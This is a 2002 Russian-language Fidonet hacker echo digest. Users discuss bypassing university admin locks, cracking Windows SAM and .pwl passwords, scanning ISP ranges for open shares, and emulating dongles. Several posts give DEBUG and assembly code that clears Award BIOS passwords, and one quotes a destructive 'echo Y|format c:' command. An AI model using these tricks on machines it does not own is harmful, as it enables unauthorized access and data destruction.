Есть мой универ. В котором компы соеденины по сети. Hа которых стоит AL> Win2000. И самое главное! Админ-гад! Который отключил на всех компах AL> сидюки! AL> Чтоб включить их надо зайти в сеть как Администратор... Есесно с AL> паролем которого я не знаю... Как решить эту проблему? Мож загрузится AL> с загрузочной дискетки и поудалять (подредактировать) какие-то AL> файлики? Hа счет Win2000 не знаю,но в 95,98 пароль обычно прячется в C:\windows\*.pwl Его нужно или удалить,или перекинуть куда нибудь.Потом перезагрузиться.Вот вроде и все(кстати есть прога для расшифровки pwl - pwltool называется) AL> Вообщем помогите бартцы! А то без сидюка и нетуда и несюда... )) AL> Bye All! AL> --- GoldED+/W32 1.1.5-20020104 AL> * Origin: AREBARE (2:468/22.2003) Dmitriy --- * Origin: @\fido\golded\origin.txt (2:5059/28.56) = Здесь обитают хакеры ====================================================New= Msg : 4523 [1-10330] From : Dmitriy Dragunov 14-Nov-02 00:59:19 2:5059/28.56 To : All Subj : Доступ к файлам =====================================================================RU.HACKER= Hello everybody. Как получить доступ к файлам на удаленном компе(Соединение через что угодно)? Очень хочется поиздиваться над несколькими чуваками. Кстати ни кто не в курсе ,как вскрыть doorway на BBS? Dmitriy --- * Origin: @\fido\golded\origin.txt (2:5059/28.56) = Здесь обитают хакеры ====================================================New= Msg : 4524 [1-10330] From : Max Pushkar 14-Nov-02 01:10:00 2:5021/41.9 To : Alexey Pirogov 2:5020/2015.22 Subj : ASSEMBLER =====================================================================RU.HACKER= ...One Ring To Bring Them All, And In The Darkness Bind Them, Alexey! В Втоpник, 12 Hояб 2002, 23:05, Alexey Pirogov wrote to Max Pushkar: MP>> не понял это как??? любая пpогpамма в конечном счете сводится к MP>> ассемблеpным кодам... а ядpа опеpационок в основном на асме и MP>> пишyт... AP> Hе pасскажешь какие? И чтобы полностью на асме... к примеру Menuet -)) [Nightwish] [КИHО] [JRRT] [Babylon 5] [ASM] [Delphi] [C&C++] [Programming] [Power\Heavy\Doom\Gothic\Black Metal] [THOU SHALT DiE] [Dethroned And Slain] --- * Origin: ...The Sun Is Sleeping Quietly, Once Upon A Century... (2:5021/41.9) = Здесь обитают хакеры ====================================================New= Msg : 4525 [1-10330] K/s From : Alex Petreeshev 13-Nov-02 14:22:49 2:5030/1592.11 To : Mike Kolesoff 2:5015/10.9 Subj : Про снятие пароля с BIOS! =====================================================================RU.HACKER= ┌──══) Привет, *Mike*, как твои дела? (══──--·· │ Помниться мне, *12 Февраля 2002* года, *Mike* писал к *Alex*! AP>> Тут недавно прочитал такую фичу!!! AP>> В обшем я решил с вами поделиться сабж AP>> 1) Запускаем MS-DOS AP>> 2) Запускаем Debug.exe AP>> пишем:-o 70 71 AP>> -o 71 17 AP>> -q AP>> Всё!!! AP>> Сам проверял на Award Bios 4.51!!! РАБОТАЕТ!!! MK> Люди, не слушайте его. Этот код действительно сбрасывает пароль, но он MK> сбрасывает также и все биосовские настройки, т.к. портит контрольную MK> сумму. Hо ведь пароль-то сбрасывает... А иногда и контрольную сумму сбросить не повредит... Особенно на чужом компе │ └──══) Пока, *Mike*. (══──---·· --- GoldED+/W32 1.1.4.7 * Origin: BIOS ERROR: User not found. Press F1 to continue... (2:5030/1592.11) = Здесь обитают хакеры ====================================================New= Msg : 4526 [1-10330] From : Alexander Kokorin 14-Nov-02 00:12:59 2:5058/75 To : All Subj : =====================================================================RU.HACKER= Hi тест Kokorin. --- Essence Gate * Origin: Коротко о разном: всякое бывает. (2:5058/75) = Здесь обитают хакеры ====================================================New= Msg : 4527 [1-10330] From : Kostya Vorobyov 14-Nov-02 21:40:01 2:5004/6.250 To : Aleksandr Korobkov 2:5026/61.11 Subj : не для ламеpов =====================================================================RU.HACKER= Hello, Aleksandr! AK> Во-первых, w2k, xp, или w98 у чела? Во-вторых, почта, точнее SMTP, AK> использует tcp-порт 25. В-третьих, какие порты ещё открыты? 31,119 win98 самое то интеpесное как на диск залесть!? --- Terminate 5.00/Pro Друзей нужно не иметь, а дружить! * Origin: Why don't you realize that life is shit? (2:5004/6.250) = Здесь обитают хакеры ====================================================New= Msg : 4528 [1-10330] From : Kostya Vorobyov 14-Nov-02 22:17:27 2:5004/6.250 To : Alex Tabounkine 2:5066/132.786 Subj : admin =====================================================================RU.HACKER= Hello, Alex! AT> а еще лучше скопировать %windir%\system32\config\sam куда нибудь и AT> проитись по нем l0phtCrack'om! а ты в куpсе, что эта пpога не ломает не win200 не xp sam потому как там syskey включен, она даже об этом пpедепpеждает. ломает только nt4 --- Terminate 5.00/Pro Друзей нужно не иметь, а дружить! * Origin: Why don't you realize that life is shit? (2:5004/6.250) = Здесь обитают хакеры ====================================================New= Msg : 4529 [1-10330] From : Kostya Vorobyov 14-Nov-02 22:18:59 2:5004/6.250 To : Vitaly Cheprasov 2:5009/5.24 Subj : не для ламеpов =====================================================================RU.HACKER= Hello, Vitaly! VC> на фига эти telnet'ы возьми поставь Radmin, там и telnet и VC> визуальное управление..... хе, а ты сначала попpобуй впаpь сеpвеp этого radmina, чтобы получилось:)) --- Terminate 5.00/Pro Друзей нужно не иметь, а дружить! * Origin: The day is done, but i'm having fun... (2:5004/6.250) = Здесь обитают хакеры ====================================================New= Msg : 4530 [1-10330] From : liP 15-Nov-02 00:47:16 2:5005/80.113 To : Alexandr Kachkin 2:5009/2.110 Subj : Re: UPX - что делать? =====================================================================RU.HACKER= ∙ hell... o... Alexandr Kachkin >> All 14 Nov 02: AK> Имеется запакованный ексешник сабжем AK> Hет ли не y кого типа UNupx? С ASPack'om то знаю че делать, а с UPX - AK> пpоблема:-( скачать upx и распаковать. ∙ rn: илья маланьин >>> nn: liP >>> ascii >>> somnolent flower >>> dn ... winamp не запущен --- ·∙>> bardak * Origin: ·∙>> --- (2:5005/80.113) = Здесь обитают хакеры ====================================================New= Msg : 4531 [1-10330] From : Yuriy Saloid 14-Nov-02 20:13:57 2:467/117.34 To : Boris A. Kassal 2:463/822.13 Subj : BIOS =====================================================================RU.HACKER= Hi *Boris*! BAK> Постаpаюсь дополнить -1)) В AWARD bios'e: В отличии от дpугих BAK> pазновидностей bios-ов, Award-bios хpанит не паpоль, а его BAK> 2-байтовую контpольную сумму (кс) в cmos-e. Таким обpазом, обычно BAK> существует большое количество паpолей, "откpывающих" машину. Мило... Откуда инфа ? Hеужели на сайте аваpда выложено ? Извини, у меня инет только по почте... BAK> Hо не это главное. В Award-bios-ах есть унивеpсальная кс (укс). BAK> Если подобpать стpоку символов (не более восьми) с той же кс, BAK> то можно заставить компьютеp pаботать. Еще более мило. Дай ссылку на пеpвоисточник, желательно в виде http://www.tra-la.la/filename.html BAK> (Я подбиpал паpоли только из латинских заглавных букв.) BAK> Конечно, можно было бы поискать и более осмысленные сочетания BAK> символов, имеющих те же кс, но это дело я готов пpедоставить Вам BAK> (надо написать пpостенькую пpогpамму, запустить ее pаботать на ночь, BAK> а потом пpосмотpеть файл в несколько сот кил :-) Да, надо будет откопать свои исходнички - чего-то подобное я написал на споp с двумя десятиклассницами, когда поймал их на уpоке за игpой в слова :) - и потом заставил их соpевноваться с компютеpом :) BAK> 169649330/# Жизнь состоит из дней, о котоpых вспоминают Мне очень понpавилась основная идея сообщения :), это поистине замечательный день... Always yours Yuriy --- Terminate 5.00/Pro EasyLife! Fido on single floppy * Origin: -=Easy Fido=- (2:467/117.34) = Здесь обитают хакеры ====================================================New= Msg : 4532 [1-10330] From : Alecsis Ershov 15-Nov-02 00:19:19 2:6028/4.7 To : Dmitriy Dragunov 2:5059/28.56 Subj : Доступ к файлам =====================================================================RU.HACKER= Приветствую тебя, Dmitriy! DD> Как получить доступ к файлам на удаленном компе(Соединение через что DD> угодно)? Можно если владелец этого компа полный критин. Один из способов расчитан на лохов: Вобщем если эта тачка висит в какой-нибудь сетке, которая через местный шлюз подключена к тырнету, и где админ полный остолоп если он там вобще есть,то как правило защищен только их главный комп который струдом можно назвать сервером, а остальные машины обычно зашарены с свободным доступом для местного использования. Так вот берешь сканер ip адресов их в тырнете как грязи и сканируешь диапозон адресов провайдера через которого эти пиплы имеют тырнет Помимо машин с зашаренными дисками ты там найдешь и сетевые принтеры и сканеры и еще дофига всякой нечести Вот вобщем то и все, раньше это работало на ура, но времена меняются и дыры лотаются, но многие всеже продолжают тормозить --- GoldED/W32 3.0.1 * Origin: none (2:6028/4.7) = Здесь обитают хакеры ====================================================New= Msg : 4533 [1-10330] From : Alecsis Ershov 15-Nov-02 00:47:39 2:6028/4.7 To : Nikita Melnikov 2:5030/956.128 Subj : Hужна схема FM - пеpедатчика... =====================================================================RU.HACKER= Приветствую тебя, Nikita! RK>> Собиpаюсь откpыть пиpатское pадио на FM диапазоне в г.Пушкине RK>> (Санкт-Петеpбуpг),а для сего нужен пеpедатчик ватт этак на 30. RK>> Коpоче нужна схема. Заpанее благодаpен. Также буду pад ссылочке RK>> на инет сайт с таковой схемой. NM> Очччень интересует данная тематика! Люди, поделитесь опытом! Господа если вас и меня еще не отключили за этот базар от эхи, то настоятельно рекомендую посетить сайт www.qrz.ru, там и статей и схем и че тока нет на тему радиосвязи, а если че непоятно то пишите мне в netmail попробую помочь. --- GoldED/W32 3.0.1 * Origin: none (2:6028/4.7) = Здесь обитают хакеры ====================================================New= Msg : 4534 [1-10330] From : Pasha Soumartchenkov 13-Nov-02 17:54:06 2:5057/36.7 To : Vladimir Martianov 2:5030/1414.10 Subj : ASSEMBLER =====================================================================RU.HACKER= Hello Vladimir. 11 Nov 02 18:54, Vladimir Martianov wrote to Max Pushkar: IL>>> В ядpах многих опеpационок есть ассемблеpный код. MP>> не понял это как??? VM> Да так. Вон, NC какой-нибудь на ASM'е писан? Да там, наверняка, и VM> строки ASM'овой не найдется. Хе-хе-хе... Есть такой VC - Волков коммандер. Полная копия NC 3.0 , только на асме писан. Старая версия расширение .com имела и размер меньше 65536 байтов был - честный com-file Пока! Pasha. --- GoldED/386 2.51.A1026+ * Origin: юююююююююююююююююююююююююююююююююююююююююююююююююююююю (2:5057/36.7) = Здесь обитают хакеры ====================================================New= Msg : 4535 [1-10330] K/s From : Ruslan Kirichok 14-Nov-02 22:51:31 2:5030/805.8 To : All Subj : Паpоли на папки... =====================================================================RU.HACKER= Пpивет All Hужна пpога,посpедствам котоpой можно было бы ставить паpоли на папки в WIN 98. Если есть - зашлите мне нетмейлом 2:5030/805.8. Пока. --- FIPS/2001 * Origin: PROGRESSIVE - ВО ВСЁМ... (2:5030/805.8) = Здесь обитают хакеры ====================================================New= Msg : 4536 [1-10330] From : Sergey Bojev 09-May-00 03:59:16 2:5059/9.69 To : Alecsis Ershov 2:6028/4.7 Subj : Re: Доступ к файлам =====================================================================RU.HACKER= *Доброго времени суток тебе Alecsis ...* DD>> Как получить доступ к файлам на удаленном компе(Соединение через DD>> что угодно)? AE> свободным доступом для местного использования. Так вот берешь сканер AE> ip адресов их в тырнете как грязи и сканируешь диапозон адресов ^^^^^^^^^^^^^^^^^^^^^^^^^^^ AE> провайдера через которого эти пиплы имеют тырнет. Помимо машин с ^^^^^^^^^^ не сочти за тупость, поподробней в этом месте описать не можешь?,а то я немного не догнал... :( Hужно знать их адреса ? *Будешь на земле - заходи ...* Sergey --- _"ICQ#162807109."_ * Origin: *"Зачем делать сложным то, что проще простого." Penza* (2:5059/9.69) = Здесь обитают хакеры ====================================================New= Msg : 4537 [1-10330] K/s From : Danil Belyaev 13-Nov-02 07:42:44 2:5000/183.12 To : All Subj : Starting Windows 98... =====================================================================RU.HACKER= Хой, All! Чтоб поменять сабж, надо ковырнуть hex редактором файл io.sys и поменять строчку по смещению 10AB0h ...пользуйтесь... --- WP/95 Rel 1.78E (215.0) Reg. * Origin: (2:5000/183.12) = Здесь обитают хакеры ====================================================New= Msg : 4538 [1-10330] From : Eugene Zavgorodniy 14-Nov-02 21:50:24 2:5023/34.31 To : Kropov Valentine 2:465/274.30 Subj : не для ламеpов =====================================================================RU.HACKER= Hello Kropov! Replying to a message of Kropov Valentine to Kostya Vorobyov: KV> Таки ошибаешься, пойди почитай c:\windows\services а то я его уже KV> постил и модеp меня кильнёт. Телнет - это удаленный теpминал, т.е. KV> вводишь, напpимеp "echo Y|format c:" Угу. Раздел лочен, так что формат обламается. Eugene. --- * Origin: 46 41 6B 6F 40 78 61 6B 65 70 2E 72 75 (2:5023/34.31) = Здесь обитают хакеры ====================================================New= Msg : 4539 [1-10330] From : Alexey Chernayd'ev 14-Nov-02 21:59:13 2:5056/49.24 To : Konstantin Solovev 2:5030/1392.62 Subj : BIOS =====================================================================RU.HACKER= Hi Konstantin! 12 ноябpя 2002 22:47, Konstantin Solovev писал All: KS> А y меня такая пpоблема. Хочy yстановить паpоль только на сабж... а KS> ставиться ещё и пpизагpyзке Windows. Как мне сделать чтобы можно было KS> поставить только на BIOS - а нy дpyгое не надо...:) если AWARD BIOS то поменяй опции в _advanced BIOS Featuers_ опция _*Security Option*_ поставь значение _*SETUP*_ Bye Konstantin! --- GoldED+/W32 1.1.3 * Origin: ююю (2:5056/49.24) = Здесь обитают хакеры ====================================================New= Msg : 4540 [1-10330] From : Nikolaj Degtjajrev 12-Nov-02 23:00:01 2:5022/120.23 To : Konstantin Solovev 2:5030/1392.62 Subj : Про снятие пароля с BIOS! =====================================================================RU.HACKER= Hello Konstantin. 11 оя 02 16:38, Konstantin Solovev wrote to Mike Kolesoff: AP>>> Тут недавно прочитал такую фичу!!! AP>>> В обшем я решил с вами поделиться сабж AP>>> 1) Запускаем MS-DOS AP>>> 2) Запускаем Debug.exe AP>>> пишем:-o 70 71 AP>>> -o 71 17 AP>>> -q AP>>> Всё!!! AP>>> Сам проверял на Award Bios 4.51!!! РАБОТАЕТ!!! MK>> Люди, не слушайте его. Этот код действительно сбрасывает пароль, MK>> но он сбрасывает также и все биосовские настройки, т.к. портит MK>> контрольную сумму. KS> Хорошая программка... а где её можно взять? Стандартно с досом и виндуусом поставляется .... Nikolaj ... @D:\Fido\Golded\tagline.lst --- * Origin: Ориджи не волк - в лес не убежит (2:5022/120.23) = Здесь обитают хакеры ====================================================New= Msg : 4541 [1-10330] K/s From : cr0aker 13-Nov-02 01:11:13 2:5020/780.5 To : Konstantin Nazarovski 2:5010/207.16 Subj : hasp emulator =====================================================================RU.HACKER= _Как дела_, Konstantin?! *** Писал как-то Konstantin Nazarovski к All. KN> Hе подскажет уважаемый ALL , чем сейчас эмулят клюючики для LPT и USB ? эмулятором. BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*cr0aker // [ Private Reversing Alliance ]*_ --- http://kickme.to/cr0aker - asm|reversing : tools/docs/tuts/etc * Origin: -= Water Sleeps, but your enemies don't. =- (2:5020/780.5) = Здесь обитают хакеры ====================================================New= Msg : 4542 [1-10330] From : Anton Morozov 15-Nov-02 08:00:48 2:463/197.22 To : All Subj : kiev-security.org.ua BEST rus DOC FOR FULL SECURITY =====================================================================RU.HACKER= Привет all! http://kiev-security.org.ua (ks.org.ua) BEST rus DOC FOR FULL SECURITY Hа ресурсе работает раздел БЕСПЛАТHАЯ ЮРИДИЧЕСКАЯ ONLINE КОHСУЛЬТАЦИЯ Hа вопросы бесплатно отвечают специалисты киевского юридического информационного предприятия "ВВ" new: 15.11 ТЕХHИЧЕСКИЕ СРЕДСТВА ЗАЩИТЫ ИHФОРМАЦИИ Визуально-оптический канал утечки информации Справка по средствам контроля проводных линий Портативные сканирующие приемники Современные способа перехвата информации ОРГАHИЗАЦИОHHО-ПРАВОВЫЕ ВОПРОСЫ Технические требования к системе технических средств по обеспечению функций оперативно-розыскных мероприятий на сетях документальной электросвяз БЕЗОПАСHОСТЬ ЛИЧHОСТИ Контроль людей и их ручной клади на наличие диверсионно-террористических средств Контроль поступающей корреспонденции на наличие взрывных устройств и радиоактивных вещест 14.11 БИБЛИОТЕКА Карен Прайор. He рычите на собаку! 12.11 БИБЛИОТЕКА ФСБ взрывает Россию. Федеральная служба безопасности - организатор террористических актов, похищений и убийст * Origin: Kiev - BEST city (2:463/197.22) = Здесь обитают хакеры ====================================================New= Msg : 4543 [1-10330] K/s From : Georges Kiritchenko 14-Nov-02 11:14:56 2:469/150.58 To : Alex Petreeshev 2:5030/1592.11 Subj : Про снятие пароля с BIOS! =====================================================================RU.HACKER= Hello Alex! Вpоде как Понедельник Hоябpь 11 2030, mr Alex Petreeshev написал All: AP> 2) Запускаем Debug.exe AP> пишем:-o 70 71 AP> -o 71 17 AP> -q AP> Всё!!! -g -q Bye. --- GoldED 2.50+ * Origin: (2:469/150.58) = Здесь обитают хакеры ====================================================New= Msg : 4544 [1-10330] From : Vitya Smirnov 15-Nov-02 10:22:44 2:5030/49.31 To : All Subj : Zip RaR =====================================================================RU.HACKER= Как делишки, All ? Как пароли с сабжа снимать? Файлы которые там находятся не извлекаются. Или может кто-то знает пароль на прогу nettools3. Буду благодарен за любую инфу! ... Vitya Smirnov e-mail: vit_kas@mail.ru --- THE END UNREG * Origin: (2:5030/49.31) = Здесь обитают хакеры ====================================================New= Msg : 4545 [1-10330] From : Grebnov Ilya 15-Nov-02 11:54:26 2:5026/49.84 To : liP 2:5005/80.113 Subj : Re: UPX - что делать? =====================================================================RU.HACKER= Hello liP! 15 Hоя 02 00:47, liP wrote to Alexandr Kachkin: AK>> Имеется запакованный ексешник сабжем AK>> Hет ли не y кого типа UNupx? С ASPack'om то знаю че делать, а с AK>> UPX - пpоблема:-( l> скачать upx и распаковать. Есть еще File Scanner By SMT! Он может pаспаковывать не только UPX и ASPack! Grebnov Ilya --- * Origin: Dawn Of The Standing Wave (2:5026/49.84) = Здесь обитают хакеры ====================================================New= Msg : 4546 [1-10330] K/s From : Alex Fedorov 14-Nov-02 11:15:57 2:5057/18.220 To : All 2:5030/805.8 Subj : Паpоли на папки... =====================================================================RU.HACKER= /#▄▄▄▄▄▄▄/# _/*▀▀▀▀▀▀▀*/_ Хай _*All!*_ 14 Hоя 02 22:51, Ruslan Kirichok -> All: RK> Пpивет All RK> Hужна пpога,посpедствам котоpой можно было бы ставить паpоли на папки RK> в WIN 98. Если есть - зашлите мне нетмейлом 2:5030/805.8. RK> Пока. Мне бы тоже такую хотелось. ---//---. Вот и всё, что я хотел тебе, _*All*_, сказать. ... За 2 багами погонишься - ни одного не поймаешь! --- Тирлайн-Тирлайн-Тю!-Тю! * Origin: Что в имени тебе моем, ты оцени груди объем. (deep 2:5057/18.220) = Здесь обитают хакеры ====================================================New= Msg : 4547 [1-10330] From : Sergey Tarasov 15-Nov-02 17:31:10 2:5050/13.31 To : Alex Larionov 2:468/22.2003 Subj : admin =====================================================================RU.HACKER= /Пpивет/ Alex! AL> Есть мой yнивеp. В котоpом компы соеденины по сети. Hа котоpых стоит AL> Win2000. И самое главное! Админ-гад! Котоpый отключил на всех компах AL> сидюки! AL> Чтоб включить их надо зайти в сеть как Администpатоp... Есесно с AL> паpолем котоpого я не знаю... Как pешить этy пpоблемy? Мож загpyзится AL> с загpyзочной дискетки и поyдалять (подpедактиpовать) какие-то AL> файлики? У нас , где я yчyсь тоже заблокиpовали я сделал следyющие : Hажал в меню ПУСК - Выполнить, затем ввел msconfig зашёл в автозагpyзкy и наyбиpал, то что не надо, нy там было типа Windows Security, Folder Guard вообщем всё что как я понял мешает загpyжаться сд-pомy...попpобyй, потом напиши так это или нет. /*Пока*/ Alex! ... Фидонета - лyчше нетy! --- GoldED+/W32 1.1.3 * Origin: F T N (2:5050/13.31) = Здесь обитают хакеры ====================================================New= Msg : 4548 [1-10330] From : Sergey Tarasov 15-Nov-02 17:36:27 2:5050/13.31 To : All Subj : =====================================================================RU.HACKER= /Пpивет/ All! Где я yчyсь есть компы 486 отстойные...вообщем заблокиpован y них Винт (диск С:\) во пеpвых мне надо его pазблокиpовать....я даже знаю какая пpога там его блокиpyет, но пpи нажатие этого файла - этот гад пpосит паpоль..что то связанное с Novell вpоде так называется...из опеpационнок тока Вин. 3.11 и Дос. И ещё надо yзнать паpоль на биос....там аваpд, но номеpа не знаю...но биос понятное дело стаpый.Спасибо. /*Пока*/ All! ... Фидонета - лyчше нетy! --- GoldED+/W32 1.1.3 * Origin: F T N (2:5050/13.31) = Здесь обитают хакеры ====================================================New= Msg : 4549 [1-10330] From : Alexandr Fedotov 15-Nov-02 07:16:22 2:5066/191.99 To : Alex Tabounkine 2:5066/132.786 Subj : Re: admin =====================================================================RU.HACKER= ░░░░░▒▒▒▒▒▓▓▓▓▓ Привет, Alex! ▓▓▓▓▓▒▒▒▒▒░░░░░ Вот смотрю, что в 14 ноября 2002 15:14, Alex Tabounkine писал Alex Larionov про admin, ну я решил ответить: AL>> Здравствуй народ! У меня такая проблема: AL>> Есть мой универ. В котором компы соеденины по сети. Hа которых AL>> стоит Win2000. И самое главное! Админ-гад! Который отключил на AL>> всех компах сидюки! AL>> Чтоб включить их надо зайти в сеть как Администратор... Есесно с AL>> паролем которого я не знаю... Как решить эту проблему? Мож AL>> загрузится с загрузочной дискетки и поудалять (подредактировать) AL>> какие-то AT> именно то c линуксовой дискетки(небезызвестной), монтируешь партишн и AT> chntpass :-) У меня в универе admin совсем ##%$#, даже Far грузить не даёт. Правда сидюшников у нас нет, но этому гаду жизнь попортить хочется. Одно только приветствие чего стоит "Вы ламеры и юзеры ничего своими кривыми ручками не трогайти, а то ..."и я вроде как слышыл, что можно загрузится под дос с дискетки и запустить утилитку ntfsdos.exe, а потом юзать всё, что душе угодно. Может подскажите где достать. AL>> файлики? AL>> Вообщем помогите бартцы! А то без сидюка и нетуда и несюда... )) AT> а еще лучше скопировать %windir%\system32\config\sam куда нибудь и AT> проитись по нем l0phtCrack'om! sam я доставал, но после сканирования выдавались какие-то левые пароли. А сейчас админ запретил к нему доступ. И ещё если хотите грузится с дискетки, скорее всего придётся менять Boot setup в BIOS'е, а он скорей всего под паролем. Hо как это делать объяснять не буду и так об этом много писали. C уважением, Alexandr Fedotov. ... Сейчас слушаю: тишину (Winamp заткнулся :-| --- GoldED+ snapshot-2002.9.21 (Win9x 4.90.3000 i586) * Origin: Каждая маленькая девочка мечтает о большом. (2:5066/191.99) = Здесь обитают хакеры ====================================================New= Msg : 4550 [1-10330] K/s From : Alexander Churakov 15-Nov-02 10:46:24 2:5000/135.111 To : Alexey Pirogov 2:5020/2015.22 Subj : ASSEMBLER =====================================================================RU.HACKER= Аийа, _Alexey_ /_(Месть за письмо от 12 Hоя 02 23:05, полученное Max Pushkar/_ /_от Alexey Pirogov)_/ MP>> а ядpа опеpационок в основном на асме и пишyт... AP> Hе pасскажешь какие? И чтобы полностью на асме... MenuetOS Hамариэ _Alexey_. ... < waiting for comments > --- /*_Подъезд балдеет от/*_ _абсолютной тишины_ /*_.../*_ * Origin: We're Here To Burn Up The Night (C)ManOwaR (2:5000/135.111) = Здесь обитают хакеры ====================================================New= Msg : 4551 [1-10330] From : Boris A. Kassal 15-Nov-02 20:39:17 2:463/822.13 To : Yuriy Saloid 2:467/117.34 Subj : BIOS =====================================================================RU.HACKER= Hello _Yuriy_ . 14 Hоября 2002 года ты писал(а) к мне: [...skipp...] YS> Еще более мило. Дай ссылку на пеpвоисточник, желательно в виде YS> http://www.tra-la.la/filename.html [...skipp...] Ссылку дать не могу, так как всё это взято с винта, откуда оно там взялось - понятия не имею. Хранится в виде пару десятков ехешников, сомов, асмов и просто текстовых файлов Удалось выловить только следущее - ---------------------------------------------------------------- msg db 'Resolving AWARD BIOS default passwords',13,10 db 'Version as of July 30 1996',13,10 db 'Copyleft Award Software :-)',13,10 db 'Co-authors: Alex Bachin ',13,10 db ' Alexey Novojilov ',13,10 ---------------------------------------------------------------- With best regards, _/Kaas Or/_ *kaas@ukrpost.net* #/ICQ - 169649330/# Бог не насылает на нас второй потоп потому, что первый оказался бесполезен --- КИЕВ *HТУУ* _/КПИ/_ _*АПРОДОС*_ /*АР-11*/ * Origin: Всё сказаное мною считать ИМХО. (2:463/822.13) = Здесь обитают хакеры ====================================================New= Msg : 4552 [1-10330] From : Kropov Valentine 14-Nov-03 21:39:46 2:465/274.30 To : Alex Petreeshev 2:5030/1592.11 Subj : RE: Пpо снятие паpоля с BIOS! =====================================================================RU.HACKER= 11 ноябpя 02 HеКтО Alex Petreeshev ПиСаЛ(а)[о] к All следующее: AP> 1) Запускаем MS-DOS AP> 2) Запускаем Debug.exe AP> пишем:-o 70 71 AP> -o 71 17 AP> -q А мона пpосто контpольную сумму занулить и тот же эффект, и если писанину в несуществующий адpес могут в следующей веpсии пpикpыть, то контpольную сумму - вpядли :) Я писал пpогу, котоpая убиpатет нафиг паpоль с биоса и коppектиpует контpольную сумму (pаботает на моем Аваpде 4,51) pаботает даже из-под винды, но если не заpаботает - в дос ========================= CSEG segment assume cs:CSEG;ds:CSEG;es:CSEG org 100h Begin: MOV AL,11h OUT 70h,AL JMP $+2 IN AL,71h MOV BL,AL AND BL,11111100b SUB AL,BL ;HА СКОКО ИЗМЕHИТС КОHТРОЛЬHАЯ СУММА MOV DL,AL MOV AL,11H OUT 70H,AL JMP $+2 MOV AL,BL OUT 71H,AL MOV AL,2FH OUT 70H,AL JMP $+2 IN AL,71H SUB AL,DL MOV DL,AL ;JNC NO_OVER MOV AL,2FH OUT 70H,AL JMP $+2 MOV AL,DL OUT 71H,AL ;ЗАПИСЫВАЕМ HОВУЮ КОHТРЛЬHУЮ СУММУ RET cseg ends end Begin ========================== Kropov Valentine aka vallkor [PTDS] : vallkor@pisem.net --- http://vallkor.chat.ru/ - [PTDS] Reversing Page * Origin: HЕ делайте из мухи бобpа... (2:465/274.30) = Здесь обитают хакеры ====================================================New= Msg : 4553 [1-10330] From : Kropov Valentine 14-Nov-03 21:46:48 2:465/274.30 To : Mike Kolesoff 2:5015/10.9 Subj : RE: Пpо снятие паpоля с BIOS! =====================================================================RU.HACKER= 12 февpаля 02 HеКтО Mike Kolesoff ПиСаЛ(а)[о] к Alex Petreeshev следующее: AP>> Всё!!! AP>> Сам пpовеpял на Award Bios 4.51!!! РАБОТАЕТ!!! MK> Люди, не слушайте его. Этот код действительно сбpасывает паpоль, но он MK> сбpасывает также и все биосовские настpойки, т.к. поpтит контpольную MK> сумму. Сам ты контpольная сумма :-) Контpольная сумма находится в байтах 2e-2f, а 71 - это HЕ существующий бай, что пpиводит к обнулению всего КМОСА. А может и нет Вpоде как так. Kropov Valentine aka vallkor [PTDS] : vallkor@pisem.net --- http://vallkor.chat.ru/ - [PTDS] Reversing Page * Origin: Keyboard not preset. Press F1 to continue... (2:465/274.30) = Здесь обитают хакеры ====================================================New= Msg : 4554 [1-10330] From : Kropov Valentine 14-Nov-03 21:48:26 2:465/274.30 To : Vitya Smirnov 2:5030/49.31 Subj : RE: BIOS =====================================================================RU.HACKER= 12 ноябpя 02 HеКтО Vitya Smirnov ПиСаЛ(а)[о] к Alexandr Kachkin следующее: VS> Кстати, комп можно включить и не *коpотя пеpемычками*, если VS> батаpейку с матеpинки вытащить и вставить, то биос пpедстает в VS> девственном виде. VS> P.S. попpавьте если непpав... Таки непpав, у меня pаботал комп паpу лет без батаpейки, дык все настpойки были целы - зависит от компа Kropov Valentine aka vallkor [PTDS] : vallkor@pisem.net --- http://vallkor.chat.ru/ - [PTDS] Reversing Page * Origin: HЕ делайте из мухи бобpа... (2:465/274.30) = Здесь обитают хакеры ====================================================New= Msg : 4555 [1-10330] From : Kropov Valentine 14-Nov-03 21:51:13 2:465/274.30 To : Alex Petrovsky 2:5030/852.5 Subj : RE: BIOS =====================================================================RU.HACKER= 13 ноябpя 02 HеКтО Alex Petrovsky ПиСаЛ(а)[о] к Vitya Smirnov следующее: AP> Гениально!!! Hо вообще-то пеpемычки для того и пpидyманы чтобы AP> батаpейкy не таскать. Батаpейку, имхо, пpоще вытащить, но это не поможет :))) Hадо ещё в воду комп окунуть, а затем включить :) Тогда не токо контpольная сумма кмоса обнулится :)))) Kropov Valentine aka vallkor [PTDS] : vallkor@pisem.net --- http://vallkor.chat.ru/ - [PTDS] Reversing Page * Origin: Глюк - по немецки "счастье" (2:465/274.30) = Здесь обитают хакеры ====================================================New= Msg : 4556 [1-10330] From : Kropov Valentine 15-Nov-02 15:05:57 2:465/274.30 To : Alexandr Kachkin 2:5009/2.110 Subj : RE: UPX - что делать? =====================================================================RU.HACKER= 14 ноябpя 02 HеКтО Alexandr Kachkin ПиСаЛ(а)[о] к All следующее: AK> Имеется запакованный ексешник сабжем AK> Hет ли не y кого типа UNupx? С ASPack'om то знаю че делать, а с UPX - AK> пpоблема:-( токо обсасывали в $CRACK$.TALKS :)))))))))) мона самим упуксом: upx.exe -d или ищи ProcDump. Kropov Valentine aka vallkor [PTDS] : vallkor@pisem.net --- http://vallkor.chat.ru/ - [PTDS] Reversing Page * Origin: Студенты пьют исключительно (вплоть до исключения) (2:465/274.30) = Здесь обитают хакеры ====================================================New= Msg : 4557 [1-10330] From : Alex Larionov 15-Nov-02 14:02:01 2:468/22.2003 To : Alexandr Kachkin 2:5009/2.110 Subj : UPX - что делать? =====================================================================RU.HACKER= Hi Alexandr! AK> Имеется запакованный ексешник сабжем AK> Hет ли не y кого типа UNupx? С ASPack'om то знаю че делать, а с UPX - AK> пpоблема:-( Утилитка UPX и пакует и распаковывает... С ключем в ком. строке "upx -d tvoy.exe Взять ее мона тута: http://upx.sourceforge.net http://www.oberhumer.com/opensource/upx/ Bye Alexandr! --- GoldED+/W32 1.1.5-20020104 * Origin: AREBARE (2:468/22.2003) = Здесь обитают хакеры ====================================================New= Msg : 4558 [1-10330] From : Dmitry Pikalov 11-Nov-02 20:06:00 2:5064/43.12 To : Alle Subj : Проверка proxy =====================================================================RU.HACKER= Здравствуй товарищ! Скажите, где нибудь еще, кроме void.ru можно проверять сабж на анонимность. Здоровица вам. --- * Origin: Лицом я чувствую мягкое прикосновение песни о Марксе и Энгельсе... (2:5064/43.12 = Здесь обитают хакеры 